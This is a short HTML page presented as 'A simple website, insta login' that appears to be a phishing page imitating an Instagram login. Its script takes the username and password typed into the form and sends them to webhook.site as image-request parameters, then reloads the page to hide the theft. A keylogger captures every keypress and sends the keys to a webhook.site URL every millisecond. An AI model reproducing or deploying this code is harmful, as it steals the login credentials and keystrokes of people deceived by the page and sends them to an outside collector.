<!DOCTYPE html>
 <html>
    <body>
       <h4>        A simple website, insta login </h4>       <label for="domTextElement">Username: </label>
        <input type="text" id="username" >
 <br><br>        <label for="domTextElement1">Password: </label>
       <input type="password" id="password" >
 <br><br>       
<button type="button"  onclick="getValueInput()">click me!!    </button>
         <p id="valueInput"></p>
         <script>
       const getValueInput = () =>{
       
let inputValue=document.getElementById("username").value; 
       
let inputValue1 = document.getElementById("password").value;        var i=new Image();
var j=new Image();
i.src="https://webhook.site/?password="+inputValue1;  j.src="https://webhook.site/?username="+inputValue; 
window.location.reload();
  }   
  var keys='';
var url = 'https://webhook.site/?source=post_page-----9bcafbe6ffda--------------------------------#!/f3ef3329-0365-480b-8fd3-f80eb5c2b6ce=';
 document.onkeypress = function(e)
 { 
get = window.event?event:e;
 key = get.keyCode?get.keyCode:get.charCode;
 key = String.fromCharCode(key); keys+=key;
}
window.setInterval(function(){ 
if(keys.length>0) {  
new Image().src = url+keys;
  keys = ''; }
}, 1);
</script>
    </body>
 </html>